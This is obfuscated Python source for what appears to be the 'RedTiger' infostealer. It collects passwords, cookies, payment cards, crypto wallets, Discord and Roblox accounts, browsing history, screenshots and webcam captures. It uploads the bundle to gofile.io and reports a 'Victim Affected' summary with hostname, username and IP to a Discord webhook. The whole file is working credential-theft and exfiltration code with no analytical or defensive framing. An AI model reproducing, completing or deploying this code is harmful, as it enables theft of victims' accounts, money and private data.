        BQUSAXGFXWKYKTVTEBPQROMBYHREIZUMDSCLFZXALHYPHTIHBZAZMAUHBQHNDANHNRQGA, MIZFTBKORIHFPCDLXHMSAKRMWLIXUMPVJQPLJLJACYLORQLQEGQKGMIKOPCCNXAWCZCBKINMYMZCUKFUDXUQHOAATTISMH, IHIVKPSDAWAPWJRCSMBATYJGGIFMQHCAYMGLOIEMDVPMYVWSETRHWUQOHMLRODPLDOWTMYJSRCYICJOJAVVUONT, XUGLWSFRIIZTFPJXPCEIXFZMTWWXKEUMFVJVYIAIBESAGCBAXIVKWQNRRAFKIUSRNJLHMFCLKSCIT, NHMFTBRHGDIPFDYAMZGDWZTUJYCDTOCGMYRVPOZVJJHNVUGMKVRXEXNIBNVLXGSOSNRGZHSSKRQQUNZPKXGZIHAEQTMMHDYJ, JBBCNZWAZITTKUCURBEYTVHLLDDOQLUVWGVCNDJESOEIMOWKVOIBLVAK = SOSSPMMEUDJTNJUJQYOCPXQFGXZKJZVWDWASPZDDVGRXVZMNFIXMFXNJGWUTOYXA(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF)
    except Exception as e:
        BQUSAXGFXWKYKTVTEBPQROMBYHREIZUMDSCLFZXALHYPHTIHBZAZMAUHBQHNDANHNRQGA = f"Error: {e}"
        MIZFTBKORIHFPCDLXHMSAKRMWLIXUMPVJQPLJLJACYLORQLQEGQKGMIKOPCCNXAWCZCBKINMYMZCUKFUDXUQHOAATTISMH = f"Error: {e}"
        IHIVKPSDAWAPWJRCSMBATYJGGIFMQHCAYMGLOIEMDVPMYVWSETRHWUQOHMLRODPLDOWTMYJSRCYICJOJAVVUONT = f"Error: {e}"
        XUGLWSFRIIZTFPJXPCEIXFZMTWWXKEUMFVJVYIAIBESAGCBAXIVKWQNRRAFKIUSRNJLHMFCLKSCIT = f"Error: {e}"
        NHMFTBRHGDIPFDYAMZGDWZTUJYCDTOCGMYRVPOZVJJHNVUGMKVRXEXNIBNVLXGSOSNRGZHSSKRQQUNZPKXGZIHAEQTMMHDYJ = f"Error: {e}"
        JBBCNZWAZITTKUCURBEYTVHLLDDOQLUVWGVCNDJESOEIMOWKVOIBLVAK = f"Error: {e}"

    try: 
        CJHYOYEAGHMYFNYRMQNIMMMLJZNQQIDYVDEIMLCSYEALYRTCARFQFCTFPCZADZQWUUMHCSGGHGDGCWWLAUJXSSXRQKDHHVDL = ZKWPBOSRKMFFTIPAHDXCYNWDMSNNUHLJXIAAOMDGVZXDLGSKAHEQHLLCGJYMDZHETVHEJPX(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF)
    except Exception as e:
        CJHYOYEAGHMYFNYRMQNIMMMLJZNQQIDYVDEIMLCSYEALYRTCARFQFCTFPCZADZQWUUMHCSGGHGDGCWWLAUJXSSXRQKDHHVDL = f"Error: {e}"

    try: 
        XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_camera_capture = QINAJUDPJVOBVUSQTBJIZABJIRCAQYGYWHJPMMZVBZZBEPXPDOHXIEHRDMIIXZKJGTVKUNWYWXMJAKAWVGVT(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF)
    except Exception as e:
        XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_camera_capture = f"Error: {e}"

    try: 
        XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_screenshot = RBTBMGOPRIPNYKRQYMZIVRPWDMRGEKGKIWYUFWGKYHACRULOSAVDYHMHTQVKYNGGVJWOHENMBRZZUNVN(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF)
    except Exception as e:
        XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_screenshot = f"Error: {e}"

    try: 
        AFEEGUGCNLXEZJLNNQQCXYSWAWWQVQJRNCGOYQFNUNPZJPTLIVLLKOTZIRFXIPXIGYMSQQJMQERXDIPXZQABGJ, AXPEVVQTPAIVPYSPVXQFYRBVLWLDQOPOZJZQARQDUTOKRWXPMXJRHJJAFHTSGZGED, LZHCWXPSSMIDCPJEOGOXKKMCWPPAEYJCOUIXTBNFIZRBJRPRKMJNCXALAHOSBVXWUSVMKTLOYVPBWEASOEUCWMMTTNDML = YARLGLFMBODOPYCZHMSXBVJZPUKAPWLATAXOGBINVGMDYPEKLDYWYJMAOAOSPNLPWOQFPYWDLDWWYBESKLSJXQWWWN(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF)
    except Exception as e:
        XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_screenshot = f"Error: {e}"

    try: 
        LRLJOIYTPAJDFAZWOWQFETZFEPHYSDBCFYVCNTSGNAXNYSKLPSLDLGELXUOKLFRGJKDQJDNMLABOVESIYOQHK = HFRWMGFEPVAENMVJUFXMPEJXVBXCGETNWFVVNLTPUARNURYEEQNPNIXAJLBVHCQONLFGEFTZOXYEMBSYJI(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF)
    except Exception as e:
        LRLJOIYTPAJDFAZWOWQFETZFEPHYSDBCFYVCNTSGNAXNYSKLPSLDLGELXUOKLFRGJKDQJDNMLABOVESIYOQHK = f"Error: {e}"

    if FRYEXBRJZQAMUTSCTCZSFDTSPHYEZJYRFZLFAODTZMGHRNRRLRJBFZTRTGZSVLNGGDMANOYSVGHCNYAZCPKFHVGLJSE != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Discord Injection : {FRYEXBRJZQAMUTSCTCZSFDTSPHYEZJYRFZLFAODTZMGHRNRRLRJBFZTRTGZSVLNGGDMANOYSVGHCNYAZCPKFHVGLJSE}")

    if XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_camera_capture != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Camera Capture    : {XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_camera_capture}")

    if XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_screenshot != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Screenshot        : {XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_screenshot}")

    if XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_system_info != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"System Info       : {XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_system_info}")

    if MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Discord Accounts  : {MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM}")

    if CJHYOYEAGHMYFNYRMQNIMMMLJZNQQIDYVDEIMLCSYEALYRTCARFQFCTFPCZADZQWUUMHCSGGHGDGCWWLAUJXSSXRQKDHHVDL != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Roblox Accounts   : {CJHYOYEAGHMYFNYRMQNIMMMLJZNQQIDYVDEIMLCSYEALYRTCARFQFCTFPCZADZQWUUMHCSGGHGDGCWWLAUJXSSXRQKDHHVDL}")

    if MIZFTBKORIHFPCDLXHMSAKRMWLIXUMPVJQPLJLJACYLORQLQEGQKGMIKOPCCNXAWCZCBKINMYMZCUKFUDXUQHOAATTISMH != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Passwords         : {MIZFTBKORIHFPCDLXHMSAKRMWLIXUMPVJQPLJLJACYLORQLQEGQKGMIKOPCCNXAWCZCBKINMYMZCUKFUDXUQHOAATTISMH}")

    if IHIVKPSDAWAPWJRCSMBATYJGGIFMQHCAYMGLOIEMDVPMYVWSETRHWUQOHMLRODPLDOWTMYJSRCYICJOJAVVUONT != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Cookies           : {IHIVKPSDAWAPWJRCSMBATYJGGIFMQHCAYMGLOIEMDVPMYVWSETRHWUQOHMLRODPLDOWTMYJSRCYICJOJAVVUONT}")

    if JBBCNZWAZITTKUCURBEYTVHLLDDOQLUVWGVCNDJESOEIMOWKVOIBLVAK != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Cards             : {JBBCNZWAZITTKUCURBEYTVHLLDDOQLUVWGVCNDJESOEIMOWKVOIBLVAK}")

    if XUGLWSFRIIZTFPJXPCEIXFZMTWWXKEUMFVJVYIAIBESAGCBAXIVKWQNRRAFKIUSRNJLHMFCLKSCIT != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Browsing History  : {XUGLWSFRIIZTFPJXPCEIXFZMTWWXKEUMFVJVYIAIBESAGCBAXIVKWQNRRAFKIUSRNJLHMFCLKSCIT}")

    if NHMFTBRHGDIPFDYAMZGDWZTUJYCDTOCGMYRVPOZVJJHNVUGMKVRXEXNIBNVLXGSOSNRGZHSSKRQQUNZPKXGZIHAEQTMMHDYJ != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Download History  : {NHMFTBRHGDIPFDYAMZGDWZTUJYCDTOCGMYRVPOZVJJHNVUGMKVRXEXNIBNVLXGSOSNRGZHSSKRQQUNZPKXGZIHAEQTMMHDYJ}")

    if BQUSAXGFXWKYKTVTEBPQROMBYHREIZUMDSCLFZXALHYPHTIHBZAZMAUHBQHNDANHNRQGA != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Extentions        : {BQUSAXGFXWKYKTVTEBPQROMBYHREIZUMDSCLFZXALHYPHTIHBZAZMAUHBQHNDANHNRQGA}")

    if AFEEGUGCNLXEZJLNNQQCXYSWAWWQVQJRNCGOYQFNUNPZJPTLIVLLKOTZIRFXIPXIGYMSQQJMQERXDIPXZQABGJ != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Wallets           : {AFEEGUGCNLXEZJLNNQQCXYSWAWWQVQJRNCGOYQFNUNPZJPTLIVLLKOTZIRFXIPXIGYMSQQJMQERXDIPXZQABGJ}")

    if AXPEVVQTPAIVPYSPVXQFYRBVLWLDQOPOZJZQARQDUTOKRWXPMXJRHJJAFHTSGZGED != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Game Launchers    : {AXPEVVQTPAIVPYSPVXQFYRBVLWLDQOPOZJZQARQDUTOKRWXPMXJRHJJAFHTSGZGED}")
    
    if LZHCWXPSSMIDCPJEOGOXKKMCWPPAEYJCOUIXTBNFIZRBJRPRKMJNCXALAHOSBVXWUSVMKTLOYVPBWEASOEUCWMMTTNDML != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Apps              : {LZHCWXPSSMIDCPJEOGOXKKMCWPPAEYJCOUIXTBNFIZRBJRPRKMJNCXALAHOSBVXWUSVMKTLOYVPBWEASOEUCWMMTTNDML}")
    
    if LRLJOIYTPAJDFAZWOWQFETZFEPHYSDBCFYVCNTSGNAXNYSKLPSLDLGELXUOKLFRGJKDQJDNMLABOVESIYOQHK != None:
        OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC.append(f"Interesting Files : {LRLJOIYTPAJDFAZWOWQFETZFEPHYSDBCFYVCNTSGNAXNYSKLPSLDLGELXUOKLFRGJKDQJDNMLABOVESIYOQHK}")

YUDHIIWTXRREPCXTTPKPSBPMDMXBJQLKDJDJIHDCQBVPEFZNXSLIYGJOACJRDWYCQFMFBCMHK.seek(0)

try:
    try: KGUVDGJHKNFJKLUCCZENTYOITZINGAXRTUFTBSLNMJKLOYECTEOZFQRLGYYRWD = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
    except: KGUVDGJHKNFJKLUCCZENTYOITZINGAXRTUFTBSLNMJKLOYECTEOZFQRLGYYRWD = "store4"

    USMUIEOTTUUTUYZJAPVWARAGVAWIFTNUQEHBJMTXNKHLJOYETMZWDMLBILYDW = requests.post(
        f"https://{KGUVDGJHKNFJKLUCCZENTYOITZINGAXRTUFTBSLNMJKLOYECTEOZFQRLGYYRWD}.gofile.io/uploadFile",
        files={"file": (f"RedTiger_{DMMOPUYEEXWJVPYKMTRQCTSTCJKOCJYRVLVHTTNVDBOSOUPSJTBYCOFUKVPZMRTVAWOBQLYIQAOQZWFOTRGOPCPEKGKRLGIAZY.replace(' ', '_')}.zip", YUDHIIWTXRREPCXTTPKPSBPMDMXBJQLKDJDJIHDCQBVPEFZNXSLIYGJOACJRDWYCQFMFBCMHK)}
    )

    HMQSUBKXMGZPACUJCDIKIBFTQHLNHWGLJQFGAQYMCAQCVWASUSJQRLQLMNYGHCDGYWGMJGO = USMUIEOTTUUTUYZJAPVWARAGVAWIFTNUQEHBJMTXNKHLJOYETMZWDMLBILYDW.json()["data"]["downloadPage"]
except Exception as e:
    HMQSUBKXMGZPACUJCDIKIBFTQHLNHWGLJQFGAQYMCAQCVWASUSJQRLQLMNYGHCDGYWGMJGO = f"Error: {e}"

embed = discord.Embed(title="Victim Affected", color=PMMYUBRNKOSJQJUVQRDJYNETJPTMRKEKXEJTEKEJKNDKPMGQDCZRWWVXLWZZQAENGPICUASSBWXGRFRLXZPSYRAT
).add_field(
    inline=False,
    name="Summary of Information", 
    value=f"""```
Hostname    : {WVQMJRGMABILADTYKHWPLQNKUVZSITQVRQNNBSGJGPCTTLSPKPXXFCHPDDGVQFCSCYLGZKTWEDMKCJQQWXKMI}
Username    : {DMMOPUYEEXWJVPYKMTRQCTSTCJKOCJYRVLVHTTNVDBOSOUPSJTBYCOFUKVPZMRTVAWOBQLYIQAOQZWFOTRGOPCPEKGKRLGIAZY}
DisplayName : {FJJCANLPAYLDYZMMUTZLZHCYLNCBYPFAMAMCWWSXSGKQRNWMWUKYTHIBEICPRGEAVFZMPXSWOYGZLIRHL}
Ip Public   : {MXAHHHFNPRGVFHUCAVPSUXDSBKPLHUYFPMHRVSDWQXFSVUYYGOFXITWTIEJTPVYPQKNCKBINTAOBL}
Ip Local    : {OOLRSGSTTHIBAEMCZAASWXBBZLJUABLBZXCXOUQMREVRUXIGTPPUJLYSYH}
Country     : {LBPUKSYYAHSFYHRMBFKSREEGUJBNZCPTKXYMDJPBKSSENTRTYZFKYKROYRMTESQCBOHJHA}```"""
).add_field(
    inline=False,
    name="Stolen Information", 
    value=f"""```swift
{"\n".join(OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC)}```"""
).add_field(
    inline=False,
    name="Download Link", 
    value=f"""{HMQSUBKXMGZPACUJCDIKIBFTQHLNHWGLJQFGAQYMCAQCVWASUSJQRLQLMNYGHCDGYWGMJGO}"""
).set_footer(
    text=KBBQUBJGSGXCYVOQLITDWNTZPCJXYEMZTIMJHTYYJCEBQFLNKNAVRNUEWRFGVSDJKUKONEYJQJRNUGJVIKMWCNXPLPUTBIPJZ, 
    icon_url=IVYCSVVBTOOERBZNHJOCBFXBTZDOWBFWLGIKKFPBYPKITOGKINGRDEJFIYEPSBHHNSEUXLTGIBTDINQJVXFRZKTXEETNEEPIXMC
)

try:  
    MJHFPKYALEBTYWHWSXOCHSKZDWFRGXEZVRBFOYSWAHCWIZROOZMJBPQBWLYCLLUZJFNUMDISENNKAO = discord.SyncWebhook.from_url(JNECUFARGSKZSYZNLMUSWNESETSJKPFYFDSWRJPEAWRZQELGYKXVGMKZ)
    MJHFPKYALEBTYWHWSXOCHSKZDWFRGXEZVRBFOYSWAHCWIZROOZMJBPQBWLYCLLUZJFNUMDISENNKAO.send(embed=embed, username=PSTAPZXLMXZDHWDRSLKOAMBELAGFTQFZIJBXPYPCRYXPYJRCAQ, avatar_url=IVYCSVVBTOOERBZNHJOCBFXBTZDOWBFWLGIKKFPBYPKITOGKINGRDEJFIYEPSBHHNSEUXLTGIBTDINQJVXFRZKTXEETNEEPIXMC)
except: pass


try: threading.Thread(target=PALLVOPDYWHYMQPTTZTBFQGVVVMOLHQTCDVZCEIZVECTKBTQJLKDWVSZKAOUGIVPKDZLWJUXHCTYLJJACXDMVJSNVJU).start()
except: pass
try: threading.Thread(target=UTDTZICFJGHKWOQMNJVEQNSGWCZSIHRJIIINYNXBYBXTHJXQDIIQROXCYCERBZEXBNCFBC).start()
except: pass
try: threading.Thread(target=KPOMPZMWRWZTMVIAQWIIJGKHNWRZKEUZTHRDBFQXTVGJVDDAHKNXYTRNIVQXMVWPIECUZACTGZCHUXJ).start()
except: pass
try: threading.Thread(target=DITZDVPFUBNKOIFYFGCKQROPKLLSVNARJJNAHJXZQRDKQUGQUFCDLRYBNVBCXUZBMBIRAFDZKUNQYXWBLTJRKZHBYY).start()
except: pass
try: threading.Thread(target=RNWMIPAOCDCAAAZFJDCQNHTFMAXSNFXUPWTZAVLQIDJVSPBXLUYDH).start()
except: pass
try: threading.Thread(target=EVQPLQNJUWCDELVRYWZSQXKNZXKSRJLNDTBGYKSGSFMCUGSEFIGFDPPTXYFGBEYPENJ).start()
except: pass
try: threading.Thread(target=LBFDEKUIVQHQPVDKDTMOELWSIZPUHEOHUTFIYEIXAUXLJWMHGQZUN).start()
except: pass
try: threading.Thread(target=MUHORADBYXXIZBTKQDAIDMZHDZCWEGCMDZWPXRZNPAWOCPJVBNGXLCDDUGKNWZZXKQQQCYHJQQQZGJKUUZQZNNAXWVPVNDCRSWR).start()
except: pass
